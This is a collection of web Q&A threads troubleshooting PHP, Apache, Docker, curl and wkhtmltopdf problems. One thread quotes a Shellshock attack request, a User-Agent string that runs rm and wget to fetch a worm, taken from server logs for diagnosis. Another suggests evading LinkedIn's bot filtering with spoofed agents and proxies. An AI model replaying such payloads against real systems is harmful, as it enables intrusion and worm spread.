wget fails on a local domain - php

I have a Red Hat Linux box with Apache hosting several domains, including a.com and b.com.
I have a PHP script, a.com/wget.php, which makes an exec() call to wget to download a file from the local domain b.com. Running the PHP script from the command line works.
But running this script from a web page results in a 404 error. The command is:
/usr/bin/wget -k -S --save-headers --keep-session-cookies
-O <local-file-name> -o <local-log-file-name> -U "Mozilla/5.0
(Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101
Firefox/24.0" --max-redirect=100 "http://b.com/page.php"
No log messages are written to the Apache access log file for domain b.com for this call.
BUT the server access log file (/var/log/httpd/access_log) is NOT empty; it shows that an attempt was made to open "/page.php" on the server (the entry in the access log has no domain):
xx.xx.xx.xx - - [19/May/2014:12:02:49 +0100] "GET /page.php
HTTP/1.0" 404 285 "-" "Mozilla/5.0 (Macintosh;
Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0"
Server error log (/var/log/httpd/error_log) gives this error:
[Mon May 19 12:02:49 2014] [error] [client xx.xx.xx.xx]
File does not exist: /var/www/vhosts/default/htdocs
So it would seem that something is stripping the domain name from "http://b.com/page.php", and the resulting URL that wget is trying to connect to is "/page.php". This will not work, given that the server hosts many domains.
Has anyone come across this? Is there some setting in wget, PHP, or Apache that would prevent this? I have tried different things based on suggestions for similar problems, but nothing has worked so far.
Thanks.

The problem turned out to be not in wget but in the firewall settings. The wget call, executed from behind the firewall, was resolving the domain to an external IP address, and connections to that external IP address were failing. Correcting this in the firewall fixed the wget problem.
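A quick way to confirm this kind of resolution problem is to log what the domain resolves to when the script runs under Apache versus the CLI. A minimal sketch, using the domain name from the question:
// Log which IP b.com resolves to in the current environment (web vs. CLI).
$ip = gethostbyname('b.com');
error_log('b.com resolves to ' . $ip . ' (SAPI: ' . php_sapi_name() . ')');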

Related

Can't find a docker php/nginx error log matching error 500

I have a PHP Docker app running with multiple containers, such as
j_php-fpm_1 and j_nginx_1
j_php-fpm_1 is the container with the whole project (Magento/PHP, but that's not relevant here).
My issue is the following:
At some point in the app I trigger "A technical problem with the server created an error. Try again to continue what you were doing. If the problem persists, try again later.", which means I have a server error within my PHP even before entering the framework.
So I went into my j_php-fpm_1 container, but the log file can't be read due to permission denied:
make bash
docker-compose exec -u magento php-fpm bash
magento@315933593d37:/var/www/magento$ ls -al /var/log/php7.3-fpm.log
-rw------- 1 root root 0 Jan 3 10:04 /var/log/php7.3-fpm.log
magento@315933593d37:/var/www/magento$ cat /var/log/php7.3-fpm.log
cat: /var/log/php7.3-fpm.log: Permission denied
Then I tried to check the live nginx logs:
docker logs j_nginx_1
As a result I see my request triggering the error, but still no errors printed in the log:
172.21.0.1 - - [05/Jan/2022:15:22:34 +0000] "POST /admin_sdj/sponsorship/index/sponsorship/key/d81ba9d66a439a3fe7a2e70e9567830be8b3a1cef39f8984002129045622fb59/id/1/?isAjax=true HTTP/1.1" 200 190 "http://j.dev-cpy.fr/admin_sdj/customer/index/edit/id/1/key/05dae1e3543127f8c02295e29b06b70722d085f69a37b0d7155fc257ce6b1257/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
The access log and error log from the nginx container are empty.
Any ideas where I can find my error log?
PS: I can't change the php-fpm log file permissions.
EDIT: Connecting as root with docker exec -it --user root j_php-fpm_1 /bin/bash shows the FPM log file is empty too.
I don't know where to look anymore.
I found my error's origin; it was actually a wrong URL path triggering a 404 error, which then triggered the server error in a following request. Still no idea about the logs, but at least my issue is solved for now. I'll leave the topic open in case someone has an idea.
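For anyone in a similar spot: one way to get at PHP errors while the FPM log is unreadable is to route them to a log the application user can write. A rough sketch, placed early in the entry point; the log path is an arbitrary example, not a Magento or FPM convention:
// Route PHP errors to a log file the container user can read and write.
error_reporting(E_ALL);
ini_set('display_errors', '0');   // keep error details out of the HTTP response
ini_set('log_errors', '1');
ini_set('error_log', '/var/www/magento/var/log/php_errors.log');  // path is an assumption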

Linux Apache in Sleep State

I have an Ubuntu Linux server running Apache2 with PHP.
All of a sudden my website gets this error:
404 Not Found: The requested URL / was not found on this server
I tried:
sudo service apache2 status
Result:
Apache2 is running (pid 1546)
So I tried:
cat /proc/1546/status
Result:
State: S (sleeping)
Apache error.log file:
[Fri Jul 24 05:22:46 2015] [error] [client 155.124.123.161] File does not exist: /etc/apache2/htdocs
My question is: could this be the reason my Apache server is not working properly and I get the Not Found error? Is the sleeping state of Apache a problem, and what should I do about it? My website code is in /var/www/mywebapplication. It had been working for a very long time, but suddenly it gets this error.
Thank you very much.

Apache http server has stopped working

Hi Friends,
I am using the AMPPS server with PHP 5.3.29 on Windows Server Datacenter.
Unfortunately I am getting the following prompt in Windows Server and my site goes down.
Prompt title:
Microsoft Windows
Prompt message:
Apache HTTP Server has stopped working.
A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
Trace:
When I traced the error and access logs, I found the following entries as the cause.
In Apache access log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
In Apache error log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
Please help me.
There is a web bot trying to gain access so it can wget and execute something like S0.sh, which I imagine is a worm, so the download server is compromised.
I'd like a copy of S0.sh; if you happen to get one, give it to exploit-db or something like it.
The clever command is:
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
The file is executed following download.
I suppose there's something about HDB_DATA, which I don't even have.
"Information is Paramount!"
If you try to open this file, what happens?
D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
The log indicates that the file does not exist, as shown by the 404 response and the message "script not found".
Finally, I denied those clients access to the cgi-bin directory.
In the cgi-bin directory I created a .htaccess file and added the following line:
Deny from all
I don't think authLogin.cgi really matters other than that it might allow someone to execute code. The problem is that the attacker tries to (or successfully does) remove /tmp/S0.sh, make a php directory in the share folder, and then execute wget.
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Here is what came up after all that time of wondering:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."
So it was a real treat catching this action, and initially no one knew to call it Shellshock. There is a copy of S0.sh there, and you can see it's a worm, which is what I presumed.
From what I read, the worm just scans the IP space looking for anyone listening on port 8080.

999 Error Code on HEAD request to LinkedIn

We're using a curl HEAD request in a PHP application to verify the validity of generic links. We check the status code just to make sure that the link the user has entered is valid. Links to all websites have succeeded, except LinkedIn.
While it seems to work locally (Mac), when we attempt the request from any of our Ubuntu servers, LinkedIn returns a 999 status code. It's not an API request, just a simple curl like we do for every other link. We've tried on a few different machines and tried altering the user agent, but no dice. How do I modify our curl so that working links return a 200?
A sample HEAD request:
curl -I --url https://www.linkedin.com/company/linkedin
Sample Response on Ubuntu machine:
HTTP/1.1 999 Request denied
Date: Tue, 18 Nov 2014 23:20:48 GMT
Server: ATS
X-Li-Pop: prod-lva1
Content-Length: 956
Content-Type: text/html
To respond to @alexandru-guzinschi a little better: we've tried masking the user agents. To sum up our trials:
Mac machine + Mac UA => works
Mac machine + Windows UA => works
Ubuntu remote machine + (no UA change) => fails
Ubuntu remote machine + Mac UA => fails
Ubuntu remote machine + Windows UA => fails
Ubuntu local virtual machine (on Mac) + (no UA change) => fails
Ubuntu local virtual machine (on Mac) + Windows UA => works
Ubuntu local virtual machine (on Mac) + Mac UA => works
So now I'm thinking they block any curl requests that don't provide an alternate UA, and also block hosting providers?
Is there any other way I can check if a link to LinkedIn is valid, or whether it will lead to their 404 page, from an Ubuntu machine using PHP?
It looks like they filter requests based on the user-agent:
$ curl -I --url https://www.linkedin.com/company/linkedin | grep HTTP
HTTP/1.1 999 Request denied
$ curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" -I --url https://www.linkedin.com/company/linkedin | grep HTTP
HTTP/1.1 200 OK
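Translated to PHP's curl extension, the same check might look like the sketch below (the user-agent string is just the one from the example above):
// HEAD request with a browser-like User-Agent; $status ends up 200 if allowed, 999 if denied.
$ch = curl_init('https://www.linkedin.com/company/linkedin');
curl_setopt($ch, CURLOPT_NOBODY, true);            // send a HEAD request
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3');
curl_exec($ch);
$status = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);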
I found a workaround; it is important to set the Accept-Encoding header:
curl --url "https://www.linkedin.com/in/izman" \
--header "user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" \
--header "accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" \
--header "accept-encoding:gzip, deflate, sdch, br" \
| gunzip
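In PHP the same idea can be expressed with CURLOPT_ENCODING, which makes libcurl send an Accept-Encoding header and decompress the response itself, so no manual gunzip is needed. A sketch only, not a guaranteed bypass:
// GET with browser-like headers; an empty CURLOPT_ENCODING lets curl negotiate and decode gzip/deflate.
$ch = curl_init('https://www.linkedin.com/in/izman');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_ENCODING, '');
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36');
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
));
$html = curl_exec($ch);
curl_close($ch);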
It seems like LinkedIn filters on both user agent AND IP address. I tried this both at home and from a DigitalOcean node:
curl -A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3" -I --url https://www.linkedin.com/company/linkedin
From home I got a 200 OK, from DO I got 999 Denied...
So you need a proxy service like HideMyAss or another (I haven't tested it, so I couldn't say whether it's valid or not). Here is a good comparison of proxy services.
Or you could set up a proxy on your home network, for example using a Raspberry Pi to proxy your requests. Here is a guide on that.
A proxy would work, but I think there's another way around it. I can see that from AWS and other clouds it's blocked by IP; I can issue the request from my machine and it works just fine.
I did notice that the response from the cloud service returns some JS that the browser has to execute to take you to a login page. Once there, you can log in and access the page. The login page is only shown to those accessing from a blocked IP.
If you use a headless client that executes JS, or maybe go straight to the subsequent link and provide the credentials of a LinkedIn user, you may be able to bypass it.

wkhtmltopdf integrated with PHP doesn't work on CentOS (access denied)

I installed wkhtmltopdf on my CentOS server.
Everything works fine in the shell. If I run the command in the shell:
/usr/local/bin/wkhtmltopdf http://www.google.it /var/www/html/test_report.pdf
or simply
wkhtmltopdf ... /var/www/html/test_report.pdf
everything goes well, but the same does not work if I use the exec() command in a PHP script:
exec("/usr/local/bin/wkhtmltopdf http://www.google.it /var/www/html/test_report.pdf");
I changed the permissions of the html folder to 0777, but in the access.log I have the following response:
[08/Oct/2012:17:11:18 +0200] "GET test_report.php HTTP/1.1"
200 311 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101
Firefox/15.0.1"
The same script works fine on a Windows 2003 server.
Is there a way to get around this error?
Thank you.
Most likely SELinux is blocking it; I had the same issue once.
Don't disable SELinux (that's just a bad idea/the lazy man's way to "fix" it), but use the audit2allow tool instead to figure out what context/SELinux booleans need to be altered.
See http://wiki.centos.org/HowTos/SELinux#head-faa96b3fdd922004cdb988c1989e56191c257c01 for more details.
In my case the problem was SELinux (as @Oldskool mentioned in his answer). In the exec output there was only the message PROT_EXEC|PROT_WRITE failed.
To resolve the problem I ran:
setsebool httpd_execmem on
I found this solution at groups.google.com
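For anyone hitting the same thing: capturing the command's output and exit code from PHP is what surfaces messages like PROT_EXEC|PROT_WRITE in the first place. A small sketch, using the paths from the question:
// Redirect stderr so SELinux/library errors from wkhtmltopdf end up in $output.
exec('/usr/local/bin/wkhtmltopdf http://www.google.it /var/www/html/test_report.pdf 2>&1', $output, $exitCode);
if ($exitCode !== 0) {
    error_log('wkhtmltopdf failed (' . $exitCode . '): ' . implode("\n", $output));
}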
